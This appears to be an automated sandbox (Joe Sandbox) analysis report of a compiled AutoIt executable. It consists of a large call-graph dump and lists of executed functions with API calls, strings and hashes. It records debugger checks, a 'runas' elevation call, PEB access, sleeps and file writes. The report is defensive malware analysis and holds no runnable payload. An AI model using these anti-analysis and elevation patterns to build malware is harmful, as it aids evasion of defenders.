86049->86585 86050 408f40 VariantClear 86050->86074 86057 4115d7 52 API calls 86053->86057 86063 4115d7 52 API calls 86055->86063 86064 40a04c 86057->86064 86065 429d57 86059->86065 86061 42a42f 86590 45e737 90 API calls 3 library calls 86061->86590 86063->86082 86066 40a0a7 86064->86066 86071 4091e0 324 API calls 86064->86071 86581 453443 52 API calls 86065->86581 86090 40a0af 86066->86090 86591 40c790 VariantClear ctype 86066->86591 86603 45e737 90 API calls 3 library calls 86067->86603 86068 4299d9 86073 408f40 VariantClear 86068->86073 86070 429d88 86582 453443 52 API calls 86070->86582 86071->86066 86072 429abd 86072->84943 86075 4299e2 86073->86075 86074->86034 86074->86035 86074->86037 86074->86040 86074->86045 86074->86050 86074->86055 86074->86067 86074->86068 86074->86072 86079 40a780 201 API calls 86074->86079 86080 42a452 86074->86080 86576 40c4e0 201 API calls 86074->86576 86578 40ba10 52 API calls 2 library calls 86074->86578 86579 40e270 VariantClear ctype 86074->86579 86577 410c60 VariantClear ctype 86075->86577 86079->86074 86080->86030 86082->86021 86084 402780 52 API calls 86084->86104 86085 4115d7 52 API calls 86085->86104 86087 44a801 52 API calls 86087->86104 86088 408f40 VariantClear 86117 40a162 ctype _memmove 86088->86117 86089 41130a 51 API calls __cinit 86089->86104 86091 40a11b 86090->86091 86092 42a4b4 VariantClear 86090->86092 86090->86117 86098 40a12d ctype 86091->86098 86592 40e270 VariantClear ctype 86091->86592 86092->86098 86093 40a780 201 API calls 86093->86104 86095 401980 53 API calls 86095->86104 86097 4115d7 52 API calls 86097->86117 86098->86097 86098->86117 86101 42a74d VariantClear 86101->86117 86102 40a368 86105 42aad4 86102->86105 86112 40a397 86102->86112 86103 40e270 VariantClear 86103->86117 86104->86046 86104->86061 86104->86082 86104->86084 86104->86085 86104->86087 86104->86089 86104->86093 86104->86095 86104->86106 86109 409c95 86104->86109 86586 45f508 52 API calls 86104->86586 86587 403e10 53 API calls 86104->86587 86588 408e80 VariantClear 86104->86588 86596 46fe90 VariantClear VariantClear ctype 86105->86596 86589 47390f VariantClear 86106->86589 86107 42a886 VariantClear 86107->86117 86108 42a7e4 VariantClear 86108->86117 86109->84943 86110 40a3ce 86122 40a3d9 ctype 86110->86122 86597 40b400 VariantClear VariantClear ctype 86110->86597 86112->86110 86135 40a42c ctype 86112->86135 86574 40b400 VariantClear VariantClear ctype 86112->86574 86115 42abaf 86119 42abd4 VariantClear 86115->86119 86130 40a4ee ctype 86115->86130 86116 4115d7 52 API calls 86120 42a5a6 VariantInit VariantCopy 86116->86120 86117->86088 86117->86101 86117->86102 86117->86103 86117->86105 86117->86107 86117->86108 86117->86116 86125 4115d7 52 API calls 86117->86125 86593 470870 52 API calls 86117->86593 86594 408e80 VariantClear 86117->86594 86595 44ccf1 VariantClear ctype 86117->86595 86118 40a4dc 86118->86130 86599 40e270 VariantClear ctype 86118->86599 86119->86130 86120->86117 86124 42a5c6 VariantClear 86120->86124 86123 40a41a 86122->86123 86128 42ab44 VariantClear 86122->86128 86122->86135 86123->86135 86598 40e270 VariantClear ctype 86123->86598 86124->86117 86125->86117 86126 42ac4f 86131 42ac79 VariantClear 86126->86131 86138 40a546 ctype 86126->86138 86127 40a534 86127->86138 86600 40e270 VariantClear ctype 86127->86600 86128->86135 86130->86126 86130->86127 86131->86138 86132 42ad28 86137 42ad4e VariantClear 86132->86137 86143 40a583 ctype 86132->86143 86134 40a571 86134->86143 86601 40e270 VariantClear ctype 86134->86601 86135->86115 86135->86118 86137->86143 86138->86132 86138->86134 86140 40a650 ctype 86140->84943 86141 42ae0e VariantClear 86141->86143 86143->86140 86143->86141 86602 40e270 VariantClear ctype 86143->86602 86144->84943 86145->84943 86146->84943 86147->84891 86148->84897 86149->84943 86150->84943 86151->84943 86152->84943 86153->84949 86154->84949 86155->84949 86156->84949 86157->84949 86158->84949 86159->84949 86161 403cdf 86160->86161 86162 408f40 VariantClear 86161->86162 86163 403ce7 86162->86163 86163->84937 86164->84949 86165->84949 86166->84943 86167->84905 86168->85897 86170 453439 86169->86170 86171 453419 86169->86171 86170->85901 86172 45342f 86171->86172 86227 4531b1 85 API calls 5 library calls 86171->86227 86172->85901 86174 453425 86174->85901 86175->85907 86176->85909 86177->85892 86178->85900 86179->85920 86180->85918 86181->85921 86182->85929 86183->85900 86185 40a7a6 86184->86185 86186 40ae8c 86184->86186 86188 4115d7 52 API calls 86185->86188 86228 41130a 51 API calls __cinit 86186->86228 86215 40a7c6 ctype _memmove 86188->86215 86189 40a86d 86190 40abd1 86189->86190 86208 40a878 ctype 86189->86208 86233 45e737 90 API calls 3 library calls 86190->86233 86191 408e80 VariantClear 86191->86215 86193 40bc10 53 API calls 86193->86215 86194 401b10 52 API calls 86194->86215 86195 42b791 VariantClear 86195->86215 86196 40b5f0 89 API calls 86196->86215 86198 42ba2d VariantClear 86198->86215 86199 40e270 VariantClear 86199->86215 86200 42b459 VariantClear 86200->86215 86202 42b6f6 VariantClear 86202->86215 86203 408cc0 194 API calls 86203->86215 86205 4530c9 VariantClear 86205->86215 86207 4115d7 52 API calls 86207->86215 86209 42bbf5 86234 45e737 90 API calls 3 library calls 86209->86234 86210 42bb6a 86236 44b92d VariantClear 86210->86236 86211 4115d7 52 API calls 86213 42b5b3 VariantInit VariantCopy 86211->86213 86213->86215 86215->86189 86215->86190 86215->86191 86215->86193 86215->86194 86215->86195 86215->86196 86215->86198 86215->86199 86215->86200 86215->86202 86215->86203 86215->86205 86215->86207 86215->86209 86215->86210 86215->86211 86216 408f40 VariantClear 86215->86216 86220 42bc37 86215->86220 86229 45308a 53 API calls 86215->86229 86230 470870 52 API calls 86215->86230 86231 457f66 87 API calls __write_nolock 86215->86231 86232 472f47 127 API calls 86215->86232 86216->86215 86235 45e737 90 API calls 3 library calls 86220->86235 86225->85927 86226->85931 86227->86174 86228->86215 86229->86215 86230->86215 86231->86215 86232->86215 86233->86210 86234->86210 86237->85946 86238->85951 86239->85961 86240->85967 86241->85954 86242->85973 86243->85993 86244->86000 86245->85973 86246->86002 86247->85973 86248->86002 86249->85986 86250->86002 86251->85987 86252->86002 86253->86002 86254->85981 86256 4289d2 86255->86256 86257 408db3 86255->86257 86287 45e737 90 API calls 3 library calls 86256->86287 86285 40bec0 90 API calls 86257->86285 86260 4289e5 86288 45e737 90 API calls 3 library calls 86260->86288 86261 408e5a 86261->86008 86264 428a05 86266 408f40 VariantClear 86264->86266 86265 408dc9 86265->86260 86265->86261 86265->86264 86267 40a780 201 API calls 86265->86267 86268 408e64 86265->86268 86270 408f40 VariantClear 86265->86270 86286 40ba10 52 API calls 2 library calls 86265->86286 86266->86261 86267->86265 86269 408f40 VariantClear 86268->86269 86269->86261 86270->86265 86272 408f40 VariantClear 86271->86272 86273 403d20 86272->86273 86274 403cd0 VariantClear 86273->86274 86275 403d4d 86274->86275 86289 45e17d 86275->86289 86299 4755ad 86275->86299 86302 475596 86275->86302 86305 4813fa 86275->86305 86315 467897 86275->86315 86359 46e91c 86275->86359 86276 403d76 86276->86005 86276->86016 86283->86005 86284->86007 86285->86265 86286->86265 86287->86260 86288->86264 86290 45e198 86289->86290 86291 45e19c 86290->86291 86292 45e1b8 86290->86292 86293 408f40 VariantClear 86291->86293 86294 45e1cc 86292->86294 86295 45e1db FindClose 86292->86295 86296 45e1a4 86293->86296 86297 45e1d9 ctype 86294->86297 86362 44ae3e 86294->86362 86295->86297 86296->86276 86297->86276 86377 475077 86299->86377 86301 4755c0 86301->86276 86303 475077 128 API calls 86302->86303 86304 4755a9 86303->86304 86304->86276 86306 45340c 85 API calls 86305->86306 86307 481438 86306->86307 86308 402880 95 API calls 86307->86308 86309 48143f 86308->86309 86310 481465 86309->86310 86311 40a780 201 API calls 86309->86311 86314 481469 86310->86314 86484 40e710 53 API calls 86310->86484 86311->86310 86313 4814a4 86313->86276 86314->86276 86316 4678bb 86315->86316 86317 467954 86316->86317 86320 45340c 85 API calls 86316->86320 86318 4115d7 52 API calls 86317->86318 86350 467964 86317->86350 86319 467989 86318->86319 86321 467995 86319->86321 86500 40da60 53 API calls 86319->86500 86322 4678f6 86320->86322 86325 4533eb 85 API calls 86321->86325 86324 413a0e __wsplitpath 46 API calls 86322->86324 86326 4678fc 86324->86326 86327 4679b7 86325->86327 86328 401b10 52 API calls 86326->86328 86485 40de40 86327->86485 86329 46790c 86328->86329 86497 40d200 52 API calls 2 library calls 86329->86497 86333 4679c7 GetLastError 86334 467917 86334->86317 86498 4339fa GetFileAttributesW FindFirstFileW FindClose 86334->86498 86336 467a05 86343 467928 86343->86317 86348 46792f 86343->86348 86499 4335cd 56 API calls 3 library calls 86348->86499 86350->86276 86355 467939 86355->86317 86357 408f40 VariantClear 86355->86357 86358 467947 86357->86358 86358->86317 86514 46e785 86359->86514 86361 46e92f 86361->86276 86363 44ae4b ctype 86362->86363 86365 443fdf 86362->86365 86363->86297 86370 40da20 86365->86370 86367 443feb 86374 4340db 86367->86374 86369 444001 86369->86363 86371 40da37 86370->86371 86372 40da29 86370->86372 86371->86372 86373 40da3c CloseHandle 86371->86373 86372->86367 86373->86367 86375 40da20 CloseHandle 86374->86375 86376 4340e7 ctype 86375->86376 86376->86369 86430 4533eb 86377->86430 86380 4750ee 86383 408f40 VariantClear 86380->86383 86381 475129 86434 4646e0 86381->86434 86388 4750f5 86383->86388 86384 47515e 86385 475162 86384->86385 86412 47518e 86384->86412 86386 408f40 VariantClear 86385->86386 86409 475169 86386->86409 86387 475357 86389 475365 86387->86389 86390 4754ea 86387->86390 86388->86301 86468 44b3ac 57 API calls 86389->86468 86475 464812 92 API calls 86390->86475 86394 4754fc 86395 475374 86394->86395 86396 475508 86394->86396 86447 430d31 86395->86447 86398 408f40 VariantClear 86396->86398 86397 4533eb 85 API calls 86397->86412 86405 475480 86407 408f40 VariantClear 86405->86407 86407->86409 86409->86301 86412->86387 86412->86397 86412->86405 86417 4754b5 86412->86417 86466 436299 52 API calls 2 library calls 86412->86466 86467 463ad5 64 API calls __wcsicoll 86412->86467 86418 408f40 VariantClear 86417->86418 86418->86409 86431 453404 86430->86431 86432 4533f8 86430->86432 86431->86380 86431->86381 86432->86431 86478 4531b1 85 API calls 5 library calls 86432->86478 86479 4536f7 53 API calls 86434->86479 86436 4646fc 86480 4426cd 59 API calls _wcslen 86436->86480 86438 464711 86440 40bc70 52 API calls 86438->86440 86446 46474b 86438->86446 86441 46472c 86440->86441 86481 461465 52 API calls _memmove 86441->86481 86443 464741 86444 40c600 52 API calls 86443->86444 86444->86446 86445 464793 86445->86384 86446->86445 86482 463ad5 64 API calls __wcsicoll 86446->86482 86448 430db2 86447->86448 86449 430d54 86447->86449 86466->86412 86467->86412 86468->86395 86475->86394 86478->86431 86479->86436 86480->86438 86481->86443 86482->86445 86484->86313 86486 40da20 CloseHandle 86485->86486 86487 40de4e 86486->86487 86502 40f110 86487->86502 86490 4264fa 86492 40de84 86511 40e080 SetFilePointerEx SetFilePointerEx 86492->86511 86494 40de8b 86512 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86494->86512 86496 40de90 86496->86333 86496->86336 86497->86334 86498->86343 86499->86355 86500->86321 86503 40f125 CreateFileW 86502->86503 86504 42630c 86502->86504 86506 40de74 86503->86506 86505 426311 CreateFileW 86504->86505 86504->86506 86505->86506 86507 426337 86505->86507 86506->86490 86510 40dea0 55 API calls ctype 86506->86510 86513 40df90 SetFilePointerEx SetFilePointerEx 86507->86513 86509 426342 86509->86506 86510->86492 86511->86494 86512->86496 86513->86509 86515 46e7a2 86514->86515 86516 4115d7 52 API calls 86515->86516 86519 46e802 86515->86519 86517 46e7ad 86516->86517 86518 46e7b9 86517->86518 86562 40da60 53 API calls 86517->86562 86524 4533eb 85 API calls 86518->86524 86520 46e7e5 86519->86520 86527 46e82f 86519->86527 86521 408f40 VariantClear 86520->86521 86523 46e7ea 86521->86523 86523->86361 86525 46e7ca 86524->86525 86528 40de40 60 API calls 86525->86528 86526 46e8b5 86555 4680ed 86526->86555 86527->86526 86530 46e845 86527->86530 86531 46e7d7 86528->86531 86533 4533eb 85 API calls 86530->86533 86531->86527 86534 46e7db 86531->86534 86532 46e8bb 86559 443fbe 86532->86559 86540 46e84b 86533->86540 86534->86520 86536 44ae3e CloseHandle 86534->86536 86535 46e87a 86563 4689f4 59 API calls 86535->86563 86536->86520 86537 46e883 86541 4013c0 52 API calls 86537->86541 86540->86535 86540->86537 86543 46e88f 86541->86543 86544 40e0a0 52 API calls 86543->86544 86546 46e899 86544->86546 86545 408f40 VariantClear 86553 46e881 86545->86553 86564 40d200 52 API calls 2 library calls 86546->86564 86547 46e911 86547->86361 86549 46e8a5 86565 4689f4 59 API calls 86549->86565 86550 40da20 CloseHandle 86552 46e903 86550->86552 86554 44ae3e CloseHandle 86552->86554 86553->86547 86553->86550 86554->86547 86556 468100 86555->86556 86557 4680fa 86555->86557 86556->86532 86566 467ac4 55 API calls 2 library calls 86557->86566 86567 443e36 86559->86567 86561 443fd3 86561->86545 86561->86553 86562->86518 86563->86553 86564->86549 86565->86553 86566->86556 86570 443e19 86567->86570 86571 443e26 86570->86571 86572 443e32 WriteFile 86570->86572 86573 443db4 SetFilePointerEx SetFilePointerEx 86571->86573 86572->86561 86573->86572 86574->86110 86575->86028 86576->86074 86577->86140 86578->86074 86579->86074 86580->86048 86581->86070 86582->86039 86583->86043 86584->86049 86585->86104 86586->86104 86587->86104 86588->86104 86589->86061 86590->86080 86591->86066 86592->86098 86593->86117 86594->86117 86595->86117 86596->86110 86597->86122 86598->86135 86599->86130 86600->86138 86601->86143 86602->86143 86603->86080 86604->86033 86605 42d154 86609 480a8d 86605->86609 86607 42d161 86608 480a8d 201 API calls 86607->86608 86608->86607 86610 480ae4 86609->86610 86611 480b26 86609->86611 86613 480aeb 86610->86613 86614 480b15 86610->86614 86612 40bc70 52 API calls 86611->86612 86638 480b2e 86612->86638 86615 480aee 86613->86615 86616 480b04 86613->86616 86642 4805bf 201 API calls 86614->86642 86615->86611 86618 480af3 86615->86618 86641 47fea2 201 API calls __itow_s 86616->86641 86640 47f135 201 API calls 86618->86640 86620 40e0a0 52 API calls 86620->86638 86622 408f40 VariantClear 86624 481156 86622->86624 86626 408f40 VariantClear 86624->86626 86625 480aff 86625->86622 86627 48115e 86626->86627 86627->86607 86628 480ff5 86648 45e737 90 API calls 3 library calls 86628->86648 86629 401980 53 API calls 86629->86638 86631 40c2c0 52 API calls 86631->86638 86632 408e80 VariantClear 86632->86638 86633 40e710 53 API calls 86633->86638 86634 40a780 201 API calls 86634->86638 86638->86620 86638->86625 86638->86628 86638->86629 86638->86631 86638->86632 86638->86633 86638->86634 86643 45377f 52 API calls 86638->86643 86644 45e951 53 API calls 86638->86644 86645 40e830 53 API calls 86638->86645 86646 47925f 53 API calls 86638->86646 86647 47fcff 201 API calls 86638->86647 86640->86625 86641->86625 86642->86625 86643->86638 86644->86638 86645->86638 86646->86638 86647->86638 86648->86625 86649 2e723b0 86663 2e70000 86649->86663 86651 2e72480 86666 2e722a0 86651->86666 86669 2e734b0 GetPEB 86663->86669 86665 2e7068b 86665->86651 86667 2e722a9 Sleep 86666->86667 86668 2e722b7 86667->86668 86670 2e734da 86669->86670 86670->86665 86671 42b14b 86678 40bc10 86671->86678 86673 42b159 86674 4096a0 338 API calls 86673->86674 86675 42b177 86674->86675 86689 44b92d VariantClear 86675->86689 86677 42bc5b 86679 40bc24 86678->86679 86680 40bc17 86678->86680 86681 40bc2a 86679->86681 86682 40bc3c 86679->86682 86690 408e80 VariantClear 86680->86690 86691 408e80 VariantClear 86681->86691 86685 4115d7 52 API calls 86682->86685 86688 40bc43 86685->86688 86686 40bc1f 86686->86673 86687 40bc33 86687->86673 86688->86673 86689->86677 86690->86686 86691->86687 86692 425b2b 86697 40f000 86692->86697 86696 425b3a 86698 4115d7 52 API calls 86697->86698 86699 40f007 86698->86699 86700 4276ea 86699->86700 86706 40f030 86699->86706 86705 41130a 51 API calls __cinit 86705->86696 86707 40f039 86706->86707 86708 40f01a 86706->86708 86736 41130a 51 API calls __cinit 86707->86736 86710 40e500 86708->86710 86711 40bc70 52 API calls 86710->86711 86712 40e515 GetVersionExW 86711->86712 86713 402160 52 API calls 86712->86713 86714 40e557 86713->86714 86737 40e660 86714->86737 86720 427674 86724 4276c6 GetSystemInfo 86720->86724 86722 40e5e0 86726 4276d5 GetSystemInfo 86722->86726 86751 40efd0 86722->86751 86723 40e5cd GetCurrentProcess 86758 40ef20 LoadLibraryA GetProcAddress 86723->86758 86724->86726 86729 40e629 86755 40ef90 86729->86755 86732 40e641 FreeLibrary 86733 40e644 86732->86733 86734 40e653 FreeLibrary 86733->86734 86735 40e656 86733->86735 86734->86735 86735->86705 86736->86708 86738 40e667 86737->86738 86739 42761d 86738->86739 86740 40c600 52 API calls 86738->86740 86741 40e55c 86740->86741 86742 40e680 86741->86742 86743 40e687 86742->86743 86744 427616 86743->86744 86745 40c600 52 API calls 86743->86745 86746 40e566 86745->86746 86746->86720 86747 40ef60 86746->86747 86748 40e5c8 86747->86748 86749 40ef66 LoadLibraryA 86747->86749 86748->86722 86748->86723 86749->86748 86750 40ef77 GetProcAddress 86749->86750 86750->86748 86752 40e620 86751->86752 86753 40efd6 LoadLibraryA 86751->86753 86752->86724 86752->86729 86753->86752 86754 40efe7 GetProcAddress 86753->86754 86754->86752 86759 40efb0 LoadLibraryA GetProcAddress 86755->86759 86757 40e632 GetNativeSystemInfo 86757->86732 86757->86733 86758->86722 86759->86757 86760 425b5e 86765 40c7f0 86760->86765 86764 425b6d 86800 40db10 52 API calls 86765->86800 86767 40c82a 86801 410ab0 6 API calls 86767->86801 86769 40c86d 86770 40bc70 52 API calls 86769->86770 86771 40c877 86770->86771 86772 40bc70 52 API calls 86771->86772 86773 40c881 86772->86773 86774 40bc70 52 API calls 86773->86774 86775 40c88b 86774->86775 86776 40bc70 52 API calls 86775->86776 86777 40c8d1 86776->86777 86778 40bc70 52 API calls 86777->86778 86779 40c991 86778->86779 86802 40d2c0 52 API calls 86779->86802 86781 40c99b 86803 40d0d0 53 API calls 86781->86803 86783 40c9c1 86784 40bc70 52 API calls 86783->86784 86785 40c9cb 86784->86785 86804 40e310 53 API calls 86785->86804 86787 40ca28 86788 408f40 VariantClear 86787->86788 86789 40ca30 86788->86789 86790 408f40 VariantClear 86789->86790 86791 40ca38 GetStdHandle 86790->86791 86792 429630 86791->86792 86793 40ca87 86791->86793 86792->86793 86794 429639 86792->86794 86799 41130a 51 API calls __cinit 86793->86799 86805 4432c0 57 API calls 86794->86805 86796 429641 86806 44b6ab CreateThread 86796->86806 86798 42964f CloseHandle 86798->86793 86799->86764 86800->86767 86801->86769 86802->86781 86803->86783 86804->86787 86805->86796 86806->86798 86807 44b5cb 58 API calls 86806->86807 86808 425b6f 86813 40dc90 86808->86813 86812 425b7e 86814 40bc70 52 API calls 86813->86814 86815 40dd03 86814->86815 86822 40f210 86815->86822 86817 426a97 86819 40dd96 86819->86817 86820 40ddb7 86819->86820 86825 40dc00 52 API calls 2 library calls 86819->86825 86821 41130a 51 API calls __cinit 86820->86821 86821->86812 86826 40f250 RegOpenKeyExW 86822->86826 86824 40f230 86824->86819 86825->86819 86827 425e17 86826->86827 86828 40f275 RegQueryValueExW 86826->86828 86827->86824 86829 40f2c3 RegCloseKey 86828->86829 86830 40f298 86828->86830 86829->86824 86831 40f2a9 RegCloseKey 86830->86831 86832 425e1d 86830->86832 86831->86824

                                                            Executed Functions

                                                            Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004096C1
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 0040970C
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                            • _memmove.LIBCMT ref: 00409D96
                                                            • _memmove.LIBCMT ref: 0040A6C4
                                                            • _memmove.LIBCMT ref: 004297E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 2383988440-0
                                                            • Opcode ID: 0a51d605390278972d17bc549f0a479dc83a3bb1102665bc1a1eaaf99b140ba9
                                                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                            • Opcode Fuzzy Hash: 0a51d605390278972d17bc549f0a479dc83a3bb1102665bc1a1eaaf99b140ba9
                                                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                            Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                            • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Strings
                                                            • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                            • runas, xrefs: 0042E2AD, 0042E2DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                            • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                            • API String ID: 2495805114-3383388033
                                                            • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                            • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                            Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1919->1937 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
